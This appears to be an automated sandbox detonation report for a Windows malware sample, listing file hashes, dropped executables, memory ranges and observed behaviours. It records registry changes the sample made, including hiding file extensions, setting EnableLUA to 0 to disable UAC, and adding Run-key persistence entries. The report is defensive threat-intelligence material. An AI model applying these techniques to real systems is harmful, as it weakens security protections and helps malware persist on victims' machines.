| SHA512 | ff7b7dcd298a4237b627dea63a336db65bd89c1c583e12cc7cc7209983e421a0f392333837cb61fe74214f2a101b05739f2e32c1b81f07509553e2ea667e54df |
C:\Users\Admin\AppData\Local\Temp\gMQa.exe
| MD5 | dbe5689ec20dc7ea26048039d17161a3 |
| SHA1 | af33f44fd4b1610c447709680c186f9e8ea53df0 |
| SHA256 | 8b2512e9f939f431e5687746b33d0d129d09d31f5efd8c460d77db10e1e96444 |
| SHA512 | 8f07ef38d6e7a643c097d3029411c7b302794fc7c067a653e18c2344e05cda7e40806a7a7a48ec2f9d2e8ff9ef5d1af40fae9b97f58098b1205b96c1c4e5b44b |
C:\Users\Admin\AppData\Local\Temp\swUe.exe
| MD5 | 99d3a078c256d0d0d5692eebffc3caac |
| SHA1 | 55ceccd9b3416141fb5ea97323fd45f1ab02597e |
| SHA256 | ea78894ce0ce2d58dbdea3fca45ea0772cff2a5259a9c584dda4df36822f7609 |
| SHA512 | d9d3971e36370c116e5197b963557c40cdaf06f7b46bdc1b65b6c0293adc09e61a027e49387941e6ea6e791f92a33c7eeb2a8726e2b3afc8936258d90d87d2b1 |
C:\Users\Admin\AppData\Local\Temp\Ewgi.exe
| MD5 | 92ae9bdd380600fbecccd67580d2bb0a |
| SHA1 | e6f0b62559ac9d3b9281f463a3960733c227a175 |
| SHA256 | fdce04f2e484616b0c6a0247c659eb6d55a8932cd889133936682aa05d1e4036 |
| SHA512 | a06f5d1a81ce5933f6cf8ef52442175d911705a75fc459d81f7362b98be7b7b2862a1fcc529141b7669c8f02c2ca35c0b378590ea1c59a1cf41e31bdfbd45da3 |
C:\Users\Admin\AppData\Local\Temp\Esgg.exe
| MD5 | 1fd62683b1becd7b9e30fbd6a6906719 |
| SHA1 | 96040b9c0fd69d0dcd2d3f6f90cdbb0e2b3334be |
| SHA256 | 522fba5aca5e69d474c3b069cc2fff015d10eb9d1b4b615ea27e8ab8a10c218d |
| SHA512 | c99d1a63093dceba8dd366d84ae62fc0b37893aec68bd3565b5a5cd7ac48b00417786ac1a909e4b825fb1c1bf34411883a8396d226f4ea14ba3c5781297db3a1 |
C:\Users\Admin\AppData\Local\Temp\GgEW.exe
| MD5 | 54c53bef9581dc8330cf37f3cffe04be |
| SHA1 | dd3b97118679fcb0467f1683b2f18efd83f1b033 |
| SHA256 | b878892bafe71a6fd28f21955148e2850183640c61fd2a2c018331b7992629f3 |
| SHA512 | 675e5923bbbc2fb3ccb539fb639d074eafd96097d7598ba615e444c6212dd7a0411a4c1fb90a7181ee8ccbb028f454bc7655b217b72903fd279e480941173cd3 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png.exe
| MD5 | d8f0397327bd02305455a67c3b97fbe6 |
| SHA1 | 0ac56e66542c59e2173af73d9c611da6cb901a46 |
| SHA256 | b832a0d23d1aaeff64bcd67db4ae9613480c4c74082ce9e1f2d38cd23e2ff425 |
| SHA512 | f323b7d79db4b1634080bbd2ad96348ba7f8010d72ae0ba6d8da942f9863db9d28f08a32cdbd29ccb9192afd7d7f1c4c7bf771f5f562ec36f6acffcee3aaae87 |
C:\Users\Admin\AppData\Local\Temp\mQcU.exe
| MD5 | c03fec8d4a221a4b55d0dbe679a1990d |
| SHA1 | 46016a2c7ace732eace55830b61dd8fc861f68e1 |
| SHA256 | 51f77a6f7bfdbe5b26cae05fc617d0729729f4455581de431a58cf096966aecd |
| SHA512 | a617e20166e64a6eff955a7073af91686938c38b680680310754ea585ab9dd3d3f2d829f9a7fac83e85b4cf3ddfef4a128fb911395577f7e6c6e38824554d65b |
memory/2056-932-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\akYA.exe
| MD5 | 9058b09d8a8c46aeea2e77d92990e2ae |
| SHA1 | 0786dbf922a9eca715f1d83a918e09e233837292 |
| SHA256 | 264a258daa5cbcec09fc110e01ec59ba3ba460a7f199cd93bc3b801d0b899a2e |
| SHA512 | 4e8ec7f18a943d1b1429bc677d679e409753df401d9834fb6ec341cd60534182a1454ef0454e32c34e40ac9424590a0db06d243d0a20a8280f3615fee01045b8 |
C:\Users\Admin\AppData\Local\Temp\KYcG.exe
| MD5 | 9a2661f89a6bd94ddb9529b6d636fb03 |
| SHA1 | 612c7b1e91539d0732b352d4c8877802cd3c9275 |
| SHA256 | 98ca765fa523f1c0e69b9fc5c0c8d65969ec78b36de1ca77842837f6ae099fa8 |
| SHA512 | 3011534b2c5441abaf88bc54f53db21528ec3b65b6b21765a0b33553e53a0a0acd1e2e0c9c0a8b8f50f8b217afd465ba6ac9cf23b94905e1f7b5cee4297ebb48 |
C:\Users\Admin\AppData\Local\Temp\uUEy.exe
| MD5 | 995c655d620f2fb1269d5dbce1426ae7 |
| SHA1 | 24fdbfad1a0c361ff819fb8265a13d23f20d8ee7 |
| SHA256 | 865902ab0f8bb881366e880f31e4eb73d5381b8d15ffb3735ff897c1a225c219 |
| SHA512 | fcc25ba3acb2bf9a3b6ec40b91583d548f2f2ef06c5046d1b3b0d17ece9f7ecdd312a4f333f1684186753b811b2dca3c7bbecbace7a510c0895586f9f65d3fb2 |
C:\Users\Admin\AppData\Local\Temp\eIgq.exe
| MD5 | 5c67a85c0df04edf58b5a670911827bc |
| SHA1 | d7502c6a6ad69db9a3b27543f9b47529b8c78c84 |
| SHA256 | 4257bb7a144613785131f08c91a3d44dda8734fb543c9a9260e74a1e2997c3e1 |
| SHA512 | c8c41dbb0b762893bd15dfc59efd41dc405464bfbacfb954288a40a9f254513b60c9687b409cf037345023d975f8f0d099a328e0682ad632a24b005b83ce676b |
memory/4248-844-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2284-827-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2760-764-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4248-747-0x0000000000400000-0x000000000047A000-memory.dmp
memory/220-630-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2760-617-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1368-564-0x0000000000400000-0x000000000047A000-memory.dmp
memory/220-547-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2336-431-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1368-413-0x0000000000400000-0x000000000047A000-memory.dmp
memory/512-311-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2336-301-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4716-258-0x0000000000400000-0x000000000047A000-memory.dmp
memory/512-254-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2176-245-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4716-241-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2176-229-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3576-221-0x0000000000400000-0x000000000047A000-memory.dmp
memory/5040-218-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4560-209-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3576-205-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3980-197-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4560-193-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3980-185-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3244-181-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2284-177-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2284-157-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1508-146-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3096-139-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1460-131-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4860-130-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2984-126-0x0000000000400000-0x000000000046E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
| MD5 | 9be40486ad4e673aec97906a636ccb2b |
| SHA1 | 19130bbaf3f33098a884ae68b3e5b0e8e2789c14 |
| SHA256 | 622d8defdd6b6abd80a45ccec629363cf38a7d338945cf1af27bdfe7d0b777b6 |
| SHA512 | 9017b561dff451148f1f1a5da2028b2eba6162ab37dceece82b28f28269dd2bb6295d02c097f9550aa87b64841290a7cc587c6aae123168bf53efed0620172ed |
memory/1460-119-0x0000000000400000-0x000000000047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vEgsgIsQ.bat
| MD5 | bae1095f340720d965898063fede1273 |
| SHA1 | 455d8a81818a7e82b1490c949b32fa7ff98d5210 |
| SHA256 | ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a |
| SHA512 | 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024 |
memory/1696-102-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4820-100-0x0000000000400000-0x000000000046F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\file.vbs
| MD5 | 4afb5c4527091738faf9cd4addf9d34e |
| SHA1 | 170ba9d866894c1b109b62649b1893eb90350459 |
| SHA256 | 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc |
| SHA512 | 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5 |
memory/4452-88-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1508-87-0x0000000000400000-0x000000000047A000-memory.dmp
memory/992-79-0x0000000000400000-0x000000000047A000-memory.dmp
memory/3228-75-0x0000000000400000-0x000000000047A000-memory.dmp
memory/992-63-0x0000000000400000-0x000000000047A000-memory.dmp
memory/1616-52-0x0000000000400000-0x000000000047A000-memory.dmp
memory/4452-43-0x0000000000400000-0x000000000047A000-memory.dmp
memory/2472-27-0x0000000000400000-0x000000000047A000-memory.dmp
memory/5040-21-0x0000000000400000-0x000000000047A000-memory.dmp
C:\ProgramData\waoYUQws\rgQoYAEU.exe
| MD5 | 38ef86528a052a9755cfb9407997750b |
| SHA1 | 31b400331fdb503a5ad80e94d54d83240aea3d02 |
| SHA256 | ac4f9cefbf2860df0312cc7c29709ecd91f959bf084429e6cb76234a4a70d608 |
| SHA512 | ea80fa89179bdab7dae454bdfe934d1a4ba72334e4362286d6358abc76498d519bcda361e0d34967d873db300aba84735a485b17f18d417ede378734ff48e366 |
memory/4820-6-0x0000000000400000-0x000000000046F000-memory.dmp
C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe
| MD5 | fa10f15d2c2b900ec50d54ba5ce88029 |
| SHA1 | 7db6d67e474e791018cc08a2b755880271615d5e |
| SHA256 | 1487f2b0d6fcf018c6701a755708ba410097a8db7f0dd0d4ab50917d7db58401 |
| SHA512 | 47b7389df2497d40453341d721c419babb1ff68112cce7630a732abc94519e16b5795f17bf9b654e49632b2ce786a88a0fd2b0cfaa85a3a94926de9ed447d4d9 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-07 19:21
Reported
2024-01-07 19:25
Platform
win7-20231215-en
Max time kernel
165s
Max time network
218s
Command Line
Signatures
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\kSkcMIIs\duUEccEA.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\dyIgEEcE\csUgAwMs.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| N/A | N/A | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\duUEccEA.exe = "C:\\Users\\Admin\\kSkcMIIs\\duUEccEA.exe" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fyAAYsIM.exe = "C:\\ProgramData\\guYwUoIY\\fyAAYsIM.exe" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows\CurrentVersion\Run\duUEccEA.exe = "C:\\Users\\Admin\\kSkcMIIs\\duUEccEA.exe" | C:\Users\Admin\kSkcMIIs\duUEccEA.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fyAAYsIM.exe = "C:\\ProgramData\\guYwUoIY\\fyAAYsIM.exe" | C:\ProgramData\guYwUoIY\fyAAYsIM.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\fyAAYsIM.exe = "C:\\ProgramData\\guYwUoIY\\fyAAYsIM.exe" | C:\ProgramData\dyIgEEcE\csUgAwMs.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\kSkcMIIs\duUEccEA | C:\ProgramData\dyIgEEcE\csUgAwMs.exe | N/A |
